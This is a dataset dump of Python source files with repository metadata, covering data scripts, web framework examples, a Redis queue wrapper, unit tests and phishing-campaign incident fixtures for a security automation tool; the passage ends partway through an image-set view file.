Dataset schema (one row per source file; "nullable" marks columns that may be null):

hexsha: string (length 40)
size: int64 (min 6, max 782k)
ext: string (7 classes)
lang: string (1 class)
max_stars_repo_path: string (length 4-237)
max_stars_repo_name: string (length 6-72)
max_stars_repo_head_hexsha: string (length 40)
max_stars_repo_licenses: list
max_stars_count: int64 (min 1, max 53k), nullable
max_stars_repo_stars_event_min_datetime: string (length 24), nullable
max_stars_repo_stars_event_max_datetime: string (length 24), nullable
max_issues_repo_path: string (length 4-184)
max_issues_repo_name: string (length 6-72)
max_issues_repo_head_hexsha: string (length 40)
max_issues_repo_licenses: list
max_issues_count: int64 (min 1, max 27.1k), nullable
max_issues_repo_issues_event_min_datetime: string (length 24), nullable
max_issues_repo_issues_event_max_datetime: string (length 24), nullable
max_forks_repo_path: string (length 4-184)
max_forks_repo_name: string (length 6-72)
max_forks_repo_head_hexsha: string (length 40)
max_forks_repo_licenses: list
max_forks_count: int64 (min 1, max 12.2k), nullable
max_forks_repo_forks_event_min_datetime: string (length 24), nullable
max_forks_repo_forks_event_max_datetime: string (length 24), nullable
content: string (length 6 to 782k)
avg_line_length: float64 (min 2.75, max 664k)
max_line_length: int64 (min 5, max 782k)
alphanum_fraction: float64 (min 0, max 1)
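The rows below follow this schema. As a hedged sketch of how rows of this shape can be consumed (the dataset identifier is a placeholder; only the column names are taken from the schema above):

import itertools
from datasets import load_dataset  # Hugging Face datasets library

# placeholder dataset id; substitute the actual source of this dump
rows = load_dataset("example-org/python-source-dump", split="train", streaming=True)
for row in itertools.islice(rows, 3):
    print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])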
hexsha: df8424f222409c2cd454068f3ca5a2c343650c81 | size: 2,113 | ext: py | lang: Python
path: _scripts/make_committees_data.py | repo: GCCR/GCCR.github.io | head: 9400e64ee1eb618bfaeaf7a1c927a04165db191b | licenses: ["MIT"]
stars: 5 (2020-03-27T20:01:18.000Z to 2021-06-06T12:41:20.000Z) | issues: 39 (2020-04-01T23:55:10.000Z to 2022-02-26T07:09:57.000Z) | forks: 3 (2020-03-29T16:06:02.000Z to 2020-04-07T19:23:37.000Z)
import os
import re
import logging
import pandas as pd
from googleapiclient.discovery import build
import yaml
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
# load personal websites
with open("_data/websites.yml", "r") as f:
WEBSITES = yaml.load(f, Loader=yaml.BaseLoader)
def member_url(member):
name, *rest = member.split(" (")
try:
url = WEBSITES[name]
except KeyError:
return member
rest = f' ({"".join(rest)}' if rest else ""
return f'<a href="{url}">{name}</a>{rest}'
# fetch Google Sheet for members data
GOOGLE_API_KEY = os.environ["GOOGLE_API_KEY"]
COMMITTEES_SPREADSHEET_ID = os.environ["COMMITTEES_SPREADSHEET_ID"]
service = build("sheets", "v4", developerKey=GOOGLE_API_KEY)
sheet = service.spreadsheets()
result = sheet.values().get(spreadsheetId=COMMITTEES_SPREADSHEET_ID,
range='Sheet1').execute()
values = result.get('values', [])
# to dataframe
columns = []
for col in values[0]:
*name, time = col.split()
columns.append((" ".join(name), time.capitalize()))
n_cols = len(columns)
columns = pd.MultiIndex.from_tuples(columns, names=["Committee", "Time"])
data = []
for row in values[1:]:
n = len(row)
row = [x if x else None for x in row]
padded = row + [None for _ in range(n_cols - n)]
data.append(padded)
df = pd.DataFrame(data, columns=columns)
# write yaml
content = {}
for committee in df.columns[1:].droplevel(1).drop_duplicates():
content[committee] = {}
for time in df[committee].columns:
col = (committee, time)
members = df[col].dropna().to_list()
if members:
content[committee][time] = [member_url(m) for m in members]
if not content[committee]:
content.pop(committee)
with open("_data/committees.yml", "w") as f:
for committee, items in content.items():
f.write(f"- committee: {committee}\n")
f.write(f" listing:\n")
for time, members in items.items():
f.write(f" - time: {time}\n")
f.write(f" members: {members}\n")
avg_line_length: 32.015152 | max_line_length: 76 | alphanum_fraction: 0.648367
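For reference, the writer loop in make_committees_data.py above emits _data/committees.yml entries of the following shape (committee, time, and member values here are illustrative placeholders, not taken from the source):

- committee: Example Committee
  listing:
    - time: Current
      members: ['<a href="https://example.org/jane">Jane Doe</a> (chair)']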
hexsha: 10f1f7311325ff8b922534481812f358ca7b3651 | size: 235 | ext: py | lang: Python
path: PMIa/2015/ANDROS_D_A/task_5_2.py | repo: YukkaSarasti/pythonintask | head: eadf4245abb65f4400a3bae30a4256b4658e009c | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null
# Task 5. Variant 2.
# Write a program that, when run, randomly displays the name of one of the three little pigs.
# Andros D.A.
# 14.04.2016
import random
pigs=["Naf-Naf","Nuf-Nuf","Nif-Nif"]
p=random.choice(pigs)
print(p)
avg_line_length: 23.5 | max_line_length: 101 | alphanum_fraction: 0.731915
hexsha: d51752bb875ccca282f100672e2eed6891f048dd | size: 789 | ext: py | lang: Python
path: docs_src/path_operation_advanced_configuration/tutorial007.py | repo: jomue/fastapi | head: bee35f5ae1fc58e7ab125427ad4287210e99d8b3 | licenses: ["MIT"]
stars: 53,007 (2018-12-08T10:05:29.000Z to 2022-03-31T23:30:02.000Z) | issues: 4,155 (2019-01-05T05:07:49.000Z to 2022-03-31T21:25:38.000Z) | forks: 4,092 (2018-12-09T16:21:00.000Z to 2022-03-31T07:59:45.000Z)
from typing import List
import yaml
from fastapi import FastAPI, HTTPException, Request
from pydantic import BaseModel, ValidationError
app = FastAPI()
class Item(BaseModel):
name: str
tags: List[str]
@app.post(
"/items/",
openapi_extra={
"requestBody": {
"content": {"application/x-yaml": {"schema": Item.schema()}},
"required": True,
},
},
)
async def create_item(request: Request):
raw_body = await request.body()
try:
data = yaml.safe_load(raw_body)
except yaml.YAMLError:
raise HTTPException(status_code=422, detail="Invalid YAML")
try:
item = Item.parse_obj(data)
except ValidationError as e:
raise HTTPException(status_code=422, detail=e.errors())
return item
avg_line_length: 22.542857 | max_line_length: 73 | alphanum_fraction: 0.640051
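A minimal client sketch for the YAML endpoint above (assumes starlette's TestClient; whether the raw body is passed as data= or content= depends on the installed starlette/httpx versions):

from fastapi.testclient import TestClient

client = TestClient(app)  # app as defined in tutorial007.py above
response = client.post("/items/", data="name: widget\ntags:\n- a\n- b")
print(response.status_code, response.json())  # expected: 200 {'name': 'widget', 'tags': ['a', 'b']}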
hexsha: 7f57f6c832b3711e423cec6abd7c42e0c01e4580 | size: 1,381 | ext: py | lang: Python
path: api/db/redis_mq.py | repo: Latent-Lxx/dazhou-dw | head: 902b4b625cda4c9e4eb205017b8955b81f37a0b5 | licenses: ["MIT"]
stars: null | issues: null | forks: 1 (2022-02-11T04:44:37.000Z to 2022-02-11T04:44:37.000Z)
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time    : 2021/7/1 4:19 PM
# @Author  : Latent
# @Email   : [email protected]
# @File    : kafka.py
# @Software: PyCharm
# @class   : a Redis-backed message queue --> producer/consumer
import redis


class RedisMQ(object):
    def __init__(self):
        # port as an int and a single encoding argument
        # (charset is a deprecated alias of encoding in redis-py)
        self.redis_mq = redis.Redis(host='127.0.0.1', port=6379, db=1, decode_responses=True,
                                    encoding='UTF-8', health_check_interval=30)

    # ==> 1. Producer
    def redis_push(self, name: str, push_msg: dict):
        try:
            self.redis_mq.lpush(name, str(push_msg))
            return 'ok'
        except Exception as e:
            print('==> error while pushing to the redis queue:', e)
            return None

    # ==> 2. Consumer
    def redis_pop(self, name: str):
        try:
            pop_value = self.redis_mq.rpop(name)
            return pop_value
        except Exception as e:
            print('==> error while popping from the redis queue:', e)
            return None

    # ==> 3. query the length of a queue
    def redis_len(self, name: str):
        count = self.redis_mq.llen(name)
        return count

    # ==> 4. get all keys
    def redis_getkey(self):
        keys = self.redis_mq.scan_iter()
        return list(keys)

    # ==> 5. clear a queue
    def redis_delete(self, redis_key):
        self.redis_mq.delete(redis_key)
        return 'ok'

    # ==> 6. URL de-duplication set
    def redis_set(self, msg):
        pass
avg_line_length: 23.016667 | max_line_length: 112 | alphanum_fraction: 0.553222
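A short usage sketch for the RedisMQ class above (assumes a Redis server reachable at 127.0.0.1:6379; the queue name is arbitrary):

mq = RedisMQ()
mq.redis_push('jobs', {'url': 'http://www.example.com'})  # LPUSH onto the list
print(mq.redis_len('jobs'))                               # 1
print(mq.redis_pop('jobs'))                               # RPOP: oldest item first, so push/pop form a FIFO queue
mq.redis_delete('jobs')                                   # drop the queue entirely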
hexsha: 1005d30b155932917243afde01f34bbe03c128da | size: 4,098 | ext: py | lang: Python
path: rbac/common/user/update_user.py | repo: fthornton67/sawtooth-next-directory | head: 79479afb8d234911c56379bb1d8abf11f28ef86d | licenses: ["Apache-2.0"]
stars: 75 (2018-04-06T09:13:34.000Z to 2020-05-18T18:59:47.000Z) | issues: 989 (2018-04-18T21:01:56.000Z to 2019-10-23T15:37:09.000Z) | forks: 72 (2018-04-13T18:29:12.000Z to 2020-05-29T06:00:33.000Z)
# Copyright 2019 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
""" Implements the UPDATE_USER message
usage: rbac.user.update()
"""
from rbac.common import addresser
from rbac.common.addresser.address_space import (
AddressSpace,
ObjectType,
RelationshipType,
)
from rbac.common.base.base_message import BaseMessage
from rbac.common.logs import get_default_logger
LOGGER = get_default_logger(__name__)
class UpdateUser(BaseMessage):
""" Implements the UPDATE_USER message
usage: rbac.user.update()
"""
def __init__(self):
super().__init__()
self._register()
@property
def message_action_type(self):
"""The action type from AddressSpace performed by this message"""
return addresser.MessageActionType.UPDATE
@property
def address_type(self):
"""The address type from AddressSpace implemented by this class"""
return AddressSpace.USER_ATTRIBUTES
@property
def object_type(self):
"""The object type from AddressSpace implemented by this class"""
return ObjectType.USER
@property
def related_type(self):
"""The related type from AddressSpace implemented by this class"""
return ObjectType.NONE
@property
def relationship_type(self):
"""The relationship type from AddressSpace implemented by this class"""
return RelationshipType.ATTRIBUTES
def make_addresses(self, message, signer_user_id):
"""Makes the appropriate inputs & output addresses for the message type"""
inputs, _ = super().make_addresses(message, signer_user_id)
user_address = self.address(object_id=message.next_id)
inputs.add(user_address)
if message.manager_id:
manager_address = self.address(object_id=message.manager_id)
inputs.add(manager_address)
outputs = inputs
return inputs, outputs
@property
def allow_signer_not_in_state(self):
"""Whether the signer of the message is allowed to not be
in state. Used only for when the transaction also creates the
signer of the message (e.g. CREATE_USER)"""
return False
def validate(self, message, signer=None):
"""Validates the message values"""
super().validate(message=message, signer=signer)
if len(message.name) < 5:
raise ValueError("Users must have names longer than 4 characters")
if message.manager_id is not None:
if message.next_id == message.manager_id:
raise ValueError("User cannot be their own manager")
def validate_state(self, context, message, payload, input_state, store):
"""Validates the message against state"""
super().validate_state(
context=context,
message=message,
payload=payload,
input_state=input_state,
store=store,
)
if not addresser.user.exists_in_state_inputs(
inputs=payload.inputs, input_state=input_state, object_id=message.next_id
):
raise ValueError("User with id {} does not exist".format(message.next_id))
if message.manager_id and not addresser.user.exists_in_state_inputs(
inputs=payload.inputs, input_state=input_state, object_id=message.manager_id
):
raise ValueError(
"Manager with id {} does not exist in state".format(message.manager_id)
)
avg_line_length: 35.947368 | max_line_length: 88 | alphanum_fraction: 0.667887
hexsha: 63f527bd2724ad07a375271eb260d585a44d04a7 | size: 274 | ext: py | lang: Python
path: src/onegov/org/views/person_move.py | repo: politbuero-kampagnen/onegov-cloud | head: 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | licenses: ["MIT"]
stars: null | issues: null | forks: null
from onegov.core.security import Private
from onegov.org import OrgApp
from onegov.org.models import PersonMove
@OrgApp.view(model=PersonMove, permission=Private, request_method='PUT')
def move_page(self, request):
request.assert_valid_csrf_token()
self.execute()
avg_line_length: 27.4 | max_line_length: 72 | alphanum_fraction: 0.79562
hexsha: 122aa105608851f3a59daba6ab2867902a33dc5f | size: 522 | ext: py | lang: Python
path: python/unittest/test_invalid_input.py | repo: zeroam/TIL | head: 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | licenses: ["MIT"]
stars: null | issues: null | forks: null
import unittest
class TestInvalidInput(unittest.TestCase):
# using a with block is the best way to assert errors
def test_string_function_failure(self):
with self.assertRaises(AttributeError):
x = None.lower()
# you can specify regex to handle the specific error message
def test_string_function_failure_with_regex(self):
with self.assertRaisesRegex(
AttributeError,
"'NoneType' object has no attribute 'lower'"):
x = None.lower()
avg_line_length: 32.625 | max_line_length: 64 | alphanum_fraction: 0.666667
hexsha: d6206fd0e0680db8bae941c703e12c1c897b855d | size: 636 | ext: py | lang: Python
path: scripts/open_cv/open_cv_sw02_get_pixel_values.py | repo: ProfJust/Ruhr-TurtleBot-Competition-RTC- | head: 5c2425bee331b4d5033757a9425676932d111775 | licenses: ["Unlicense", "MIT"]
stars: null | issues: null | forks: null
#!/usr/bin/env python3
# ################################################################################
# edited WHS, OJ , 7.1.2022 #
import cv2
print(cv2.__version__)
# read the image from disk
image = cv2.imread('/home/oj/catkin_ws/src/rtc/scripts/open_cv/test.png')
# read the colour values at position y, x
y = 100
x = 50
(b, g, r) = image[y, x]
# print the colour values to the console
print(b, g, r)
# draw a red line (in the BGR colour space)
for x in range(1, 100):
    image[y, x] = (0, 0, 255)
# show the image in a window
cv2.imshow("Bild", image)
# wait for a key press (important, otherwise the window is not shown)
cv2.waitKey(0)
avg_line_length: 21.931034 | max_line_length: 82 | alphanum_fraction: 0.589623
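A design note on the pixel loop above: OpenCV can draw the same horizontal segment in a single call. A sketch using the image and y already defined in the script:

cv2.line(image, (1, y), (99, y), (0, 0, 255), 1)  # red in BGR, thickness 1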
hexsha: d651de92c847d2506ab9d8514a8400ce98355ac1 | size: 822 | ext: py | lang: Python
path: tests/test_buendelvertrag.py | repo: bo4e/BO4E-python | head: 28b12f853c8a496d14b133759b7aa2d6661f79a0 | licenses: ["MIT"]
stars: 1 (2022-03-02T12:49:44.000Z to 2022-03-02T12:49:44.000Z) | issues: 21 (2022-02-04T07:38:46.000Z to 2022-03-28T14:01:53.000Z) | forks: null
import pytest # type:ignore[import]
from bo4e.bo.buendelvertrag import Buendelvertrag, BuendelvertragSchema
from tests.serialization_helper import assert_serialization_roundtrip # type:ignore[import]
from tests.test_vertrag import TestVertrag # type:ignore[import]
class TestBuendelvertrag:
@pytest.mark.parametrize(
"buendelvertrag",
[
pytest.param(Buendelvertrag(einzelvertraege=[TestVertrag().get_example_vertrag()])),
],
)
def test_serialization_roundtrip(self, buendelvertrag: Buendelvertrag):
assert_serialization_roundtrip(buendelvertrag, BuendelvertragSchema())
def test_missing_required_attribute(self):
with pytest.raises(TypeError) as excinfo:
_ = Buendelvertrag()
assert "missing 1 required" in str(excinfo.value)
avg_line_length: 35.73913 | max_line_length: 96 | alphanum_fraction: 0.739659
hexsha: c3d851a1dcc8577412b9a527562c32560864696c | size: 4,776 | ext: py | lang: Python
path: official/cv/ADNet/src/utils/augmentations.py | repo: leelige/mindspore | head: 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | licenses: ["Apache-2.0"]
stars: 77 (2021-10-15T08:32:37.000Z to 2022-03-30T13:09:11.000Z) | issues: 3 (2021-10-30T14:44:57.000Z to 2022-02-14T06:57:57.000Z) | forks: 24 (2021-10-15T08:32:45.000Z to 2022-03-24T18:45:20.000Z)
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# matlab code:
# https://github.com/hellbell/ADNet/blob/3a7955587b5d395401ebc94a5ab067759340680d/utils/get_extract_regions.m
# other reference: https://github.com/amdegroot/ssd.pytorch/blob/master/utils/augmentations.py
import numpy as np
import cv2
class ToTensor:
def __call__(self, cvimage, box=None, action_label=None, conf_label=None):
return cvimage.astype(np.float32), box, action_label, conf_label
class SubtractMeans:
def __init__(self, mean):
self.mean = np.array(mean, dtype=np.float32)
def __call__(self, image, box=None, action_label=None, conf_label=None):
image = image.astype(np.float32)
image -= self.mean
return image.astype(np.float32), box, action_label, conf_label
class CropRegion:
def __call__(self, image, box, action_label=None, conf_label=None):
image = np.array(image)
box = np.array(box)
if box is not None:
center = box[0:2] + 0.5 * box[2:4]
wh = box[2:4] * 1.4 # multiplication = 1.4
box_lefttop = center - 0.5 * wh
box_rightbottom = center + 0.5 * wh
box_ = [
max(0, box_lefttop[0]),
max(0, box_lefttop[1]),
min(box_rightbottom[0], image.shape[1]),
min(box_rightbottom[1], image.shape[0])
]
im = image[int(box_[1]):int(box_[3]), int(box_[0]):int(box_[2]), :]
else:
im = image[:, :, :]
return im.astype(np.float32), box, action_label, conf_label
# crop "multiplication" times of the box width and height
class CropRegion_withContext:
def __init__(self, multiplication=None):
if multiplication is None:
multiplication = 1.4 # same with default CropRegion
assert multiplication >= 1, "multiplication should more than 1 so the object itself is not cropped"
self.multiplication = multiplication
def __call__(self, image, box, action_label=None, conf_label=None):
image = np.array(image)
box = np.array(box)
if box is not None:
center = box[0:2] + 0.5 * box[2:4]
wh = box[2:4] * self.multiplication
box_lefttop = center - 0.5 * wh
box_rightbottom = center + 0.5 * wh
box_ = [
max(0, box_lefttop[0]),
max(0, box_lefttop[1]),
min(box_rightbottom[0], image.shape[1]),
min(box_rightbottom[1], image.shape[0])
]
im = image[int(box_[1]):int(box_[3]), int(box_[0]):int(box_[2]), :]
else:
im = image[:, :, :]
return im.astype(np.float32), box, action_label, conf_label
class ResizeImage:
def __init__(self, inputSize):
self.inputSize = inputSize # network's input size (which is the output size of this function)
def __call__(self, image, box, action_label=None, conf_label=None):
im = cv2.resize(image, dsize=tuple(self.inputSize[:2]))
return im.astype(np.float32), box, action_label, conf_label
class Compose():
"""Composes several augmentations together.
Args:
transforms (List[Transform]): list of transforms to compose.
Example:
# >>> augmentations.Compose([
# >>> transforms.CenterCrop(10),
# >>> transforms.ToTensor(),
# >>> ])
"""
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, img, box=None, action_label=None, conf_label=None):
for t in self.transforms:
img, box, action_label, conf_label = t(img, box, action_label, conf_label)
return img, box, action_label, conf_label
class ADNet_Augmentation:
def __init__(self, opts):
self.augment = Compose([
SubtractMeans(opts['means']),
CropRegion(),
ResizeImage(opts['inputSize']),
            # no framework tensor conversion here; ToTensor just casts to float32
ToTensor()
])
def __call__(self, img, box, action_label=None, conf_label=None):
return self.augment(img, box, action_label, conf_label)
avg_line_length: 36.181818 | max_line_length: 109 | alphanum_fraction: 0.613903
hexsha: 614e00aae487cf3d744eee81d1a5bc45e1919e33 | size: 2,526 | ext: py | lang: Python
path: exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_facts.py | repo: tr3ck3r/linklight | head: 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | licenses: ["MIT"]
stars: null | issues: null | forks: null
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..onyx_module import TestOnyxModule, load_fixture
from ansible_collections.community.general.plugins.modules.network.onyx import onyx_facts
class TestOnyxFacts(TestOnyxModule):
module = onyx_facts
def setUp(self):
super(TestOnyxFacts, self).setUp()
self.mock_run_command = patch.object(
onyx_facts.FactsBase, "_show_cmd")
self.run_command = self.mock_run_command.start()
def tearDown(self):
super(TestOnyxFacts, self).tearDown()
self.mock_run_command.stop()
def load_fixtures(self, commands=None, transport=None):
def load_from_file(*args, **kwargs):
command = args[0]
filename = "onyx_facts_%s.cfg" % command
filename = filename.replace(' ', '_')
filename = filename.replace('/', '7')
output = load_fixture(filename)
return output
self.run_command.side_effect = load_from_file
def test_onyx_facts_version(self):
set_module_args(dict(gather_subset='version'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 2)
version = facts['ansible_net_version']
self.assertEqual(version['Product name'], 'MLNX-OS')
def test_onyx_facts_modules(self):
set_module_args(dict(gather_subset='modules'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 2)
modules = facts['ansible_net_modules']
self.assertIn("MGMT", modules)
def test_onyx_facts_interfaces(self):
set_module_args(dict(gather_subset='interfaces'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 2)
interfaces = facts['ansible_net_interfaces']
self.assertEqual(len(interfaces), 2)
def test_onyx_facts_all(self):
set_module_args(dict(gather_subset='all'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 4)
avg_line_length: 35.083333 | max_line_length: 92 | alphanum_fraction: 0.682898
hexsha: 619dfdc9cb9592291fd419e39bf5a2162c03dc62 | size: 457 | ext: py | lang: Python
path: Packs/CommonScripts/Scripts/IsListExist/IsListExist.py | repo: diCagri/content | head: c532c50b213e6dddb8ae6a378d6d09198e08fc9f | licenses: ["MIT"]
stars: 799 (2016-08-02T06:43:14.000Z to 2022-03-31T11:10:11.000Z) | issues: 9,317 (2016-08-07T19:00:51.000Z to 2022-03-31T21:56:04.000Z) | forks: 1,297 (2016-08-04T13:59:00.000Z to 2022-03-31T23:43:06.000Z)
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
def main():
list_name = demisto.args()['listName']
res = demisto.executeCommand("getList", {"listName": list_name})
res = res[0]
if res['Type'] == entryTypes['error'] and "Item not found" in res['Contents']:
demisto.results('no')
else:
demisto.results('yes')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
avg_line_length: 26.882353 | max_line_length: 82 | alphanum_fraction: 0.63895
hexsha: 9c8c791e6d197a6296f7914ad78462a1e5f0326b | size: 10,145 | ext: py | lang: Python
path: Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py | repo: diCagri/content | head: c532c50b213e6dddb8ae6a378d6d09198e08fc9f | licenses: ["MIT"]
stars: 799 (2016-08-02T06:43:14.000Z to 2022-03-31T11:10:11.000Z) | issues: 9,317 (2016-08-07T19:00:51.000Z to 2022-03-31T21:56:04.000Z) | forks: 1,297 (2016-08-04T13:59:00.000Z to 2022-03-31T23:43:06.000Z)
CAMPAIGN_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "5",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:01:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.99,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.85,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_2_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "4",
"name": "Verify your example account 798",
"occurred": "2021-11-21T16:00:00.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.97,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.86,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
OLD_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_EMPTY_CAMPAIGN = {}
INCIDENTS_BY_ID = {'0': CAMPAIGN_INCIDENT_CONTEXT, '1': NEW_EMPTY_CAMPAIGN, '3': OLD_INCIDENT_CONTEXT,
'4': NEW_INCIDENT_2_CONTEXT, '5': NEW_INCIDENT_CONTEXT}
avg_line_length: 33.592715 | max_line_length: 102 | alphanum_fraction: 0.407097
hexsha: 9cb14aa80590cf8030edff4c353c93a4cee816cd | size: 4,539 | ext: py | lang: Python
path: src/onegov/org/views/imagesets.py | repo: politbuero-kampagnen/onegov-cloud | head: 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | licenses: ["MIT"]
stars: null | issues: null | forks: null
import morepath
from onegov.core.security import Public, Private
from onegov.file import File
from onegov.org import _, OrgApp
from onegov.org.elements import Link
from onegov.org.forms import ImageSetForm
from onegov.org.layout import ImageSetLayout, ImageSetCollectionLayout
from onegov.org.models import (
ImageFile,
ImageSet,
ImageSetCollection,
ImageFileCollection
)
from purl import URL
from unidecode import unidecode
def get_form_class(self, request):
if isinstance(self, ImageSetCollection):
model = ImageSet()
else:
model = self
return model.with_content_extensions(ImageSetForm, request)
@OrgApp.html(model=ImageSetCollection, template='imagesets.pt',
permission=Public)
def view_imagesets(self, request, layout=None):
# XXX add collation support to the core (create collations automatically)
imagesets = self.query().all()
imagesets = sorted(imagesets, key=lambda d: unidecode(d.title))
return {
'layout': layout or ImageSetCollectionLayout(self, request),
'title': _("Photo Albums"),
'imagesets': request.exclude_invisible(imagesets)
}
@OrgApp.html(model=ImageSet, name='select', template='select_images.pt',
